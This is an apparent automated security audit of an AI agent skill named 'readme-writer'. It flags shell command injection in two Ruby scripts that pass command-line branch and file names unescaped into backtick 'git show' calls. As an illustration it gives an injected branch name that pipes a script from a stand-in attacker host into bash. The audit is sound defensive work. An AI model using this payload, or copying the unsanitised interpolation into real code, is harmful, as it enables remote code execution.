readme-writer
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
- COMMAND_EXECUTION (HIGH): Unsafe shell command execution in
scripts/flesch_kincaid.rb. - The function
get_file_from_branch(filename, branch)(line 69) uses Ruby backticks (`) to execute a shell command:`git show #{branch}:#{filename} 2>/dev/null`. - The variables
branchandfilenameare sourced directly from command-line arguments (ARGV), which are provided by the agent based on the instructions inSKILL.md. - An attacker could provide a malicious branch name (e.g.,
main; curl http://attacker.com/script | bash) to gain full remote code execution on the environment running the skill. - COMMAND_EXECUTION (HIGH): Unsafe shell command execution in
scripts/vocabulary_profiler.rb. - The function
get_file_from_branch(filename, branch)(line 89) contains the exact same shell interpolation vulnerability as the previous script, using the same pattern:`git show #{branch}:#{filename} 2>/dev/null`. - No sanitization or escaping is performed on the input variables before they are passed to the shell.
Recommendations
- AI detected serious security threats
Audit Metadata